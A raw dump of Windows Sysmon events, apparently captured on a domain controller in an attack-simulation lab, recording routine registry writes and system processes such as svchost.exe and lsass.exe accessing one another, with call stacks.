13:09:28.619{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\srvnet\Parameters\MajorSequenceDWORD (0x0000019a) 13241300x8000000000000000955Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.588{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x8000000000000000954Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.588{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4284-6000-0100-000000009A01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000953Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.588{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4284-6000-0100-000000009A01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000952Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.588{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 13241300x8000000000000000951Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.588{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x8000000000000000950Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.588{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000949Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.588{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000948Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.572{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000947Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.572{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000946Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.572{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000945Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.572{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000944Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.572{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000943Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.572{08A6967A-4286-6000-0B00-000000009A01}8521016C:\Windows\system32\lsass.exe{08A6967A-4286-6000-0A00-000000009A01}844C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000942Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.572{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{0c97b365-de74-4c8f-8594-d5e181e04f01}\NetworkPerformsHijackingDWORD (0x00000000) 13241300x8000000000000000941Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.572{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{0c97b365-de74-4c8f-8594-d5e181e04f01}\LastProbeTimeDWORD (0x60004288) 13241300x8000000000000000940Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.572{08A6967A-4288-6000-1100-000000009A01}1192C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{0C97B365-DE74-4C8F-8594-D5E181E04F01}\DateLastConnectedBinary Data 10341000x8000000000000000939Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.557{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000938Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.557{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000937Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.557{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1500-000000009A01}1324C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000936Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.557{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000935Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.557{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000934Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.557{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000933Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.557{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000932Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-SetValue2021-01-14 13:09:28.557{08A6967A-4284-6000-0100-000000009A01}4SystemHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x8000000000000000931Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.541{08A6967A-4287-6000-0C00-000000009A01}5881104C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000930Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.541{08A6967A-4287-6000-0C00-000000009A01}588640C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1700-000000009A01}1744C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000929Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.541{08A6967A-4287-6000-0C00-000000009A01}5881028C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000928Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.541{08A6967A-4287-6000-0C00-000000009A01}5881028C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000927Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:28.541{08A6967A-4287-6000-0C00-000000009A01}5881028C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000926Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 